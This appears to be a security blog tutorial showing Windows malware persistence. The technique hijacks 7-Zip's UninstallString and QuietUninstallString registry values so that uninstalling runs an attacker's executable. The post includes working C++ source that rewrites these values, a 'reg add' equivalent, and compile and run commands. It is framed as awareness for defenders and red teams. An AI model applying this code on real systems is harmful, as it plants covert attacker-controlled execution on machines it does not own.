cocomelonc

cybersec enthusiast. CTF player

2 minute read

Hello, cybersecurity enthusiasts and white hackers!

pers

This post is the result of my own research into one of the interesting malware persistence trick: via hijacking uninstall file for target application.

uninstallation process

When you install a program on a Windows system, they usually point to their own uninstallers. They are in the registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>

and

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\QuietUninstallString\<application name>

So what is the trick? There is no problem with replacing them with commands that can run any other program. When a user executes the uninstaller, the command of the attacker’s choosing is executed. Again, the good news is that privileges are required to modify these items, as they reside under the HKLM key.

practical example

Let’s look at a practical example. Firstly, let’s choose a target application. I chose 7-zip x64:

pers

pers

pers

Then, check registry key values, for correctness:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /s

pers

Also, I prepared my evil application. It’s as usually meow-meow “malware” :)

pers

Then, I create a program, which do my logic for persistence (pers.cpp):

/*
pers.cpp
windows persistence via
hijacking uninstall app
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html
*/
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // target app
  const char* app = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\7-zip";

  // evil app
  const char* exe = "C:\\Users\\User\\Documents\\malware\\2022-10-04-malware-pers-13\\hack.exe";

  // app
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update registry key value
    // reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "...\hack.exe" /f
    RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegCloseKey(hkey);
  }

  return 0;
}

As you can see, the logic is simple, we are just update target key values in registry.

demo

Let’s go to see everything in action. Compile malware and persistence script:

x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

pers

And run at the victim’s machine - Windows 10 x64 in my case:

.\pers.exe

pers

Finally, after reboot my system, tried to uninstall 7-zip:

pers

pers

pers

pers

Then I looked at the properties of hack.exe in Process Hacker 2:

pers

as you can see the parent process is SystemSettings.exe - is what you see whenever you open your Windows settings. In our case, it is add/remove programs. Perfect! =^..^=

There are the little caveat. When I try to update key with path Z:\2022-10-04-malware-pers-13\hack.exe I get an error like this:

pers

Maybe you can use only paths inside the disk C:\.

After end of the experiments, clean up:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f

pers

conclusion

Of course, maybe this trick is not so cool for persistence, since it requires the permissions and participation of the victim’s user. But why not?

There is one more trick with using installing and removing programs for persistence, I will write about it in one of the future posts. I’m still in the process of investigating this possibility for the red team.

I hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.

RegOpenKeyEx
RegSetValueEx
RegCloseKey
reg query
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

You may also enjoy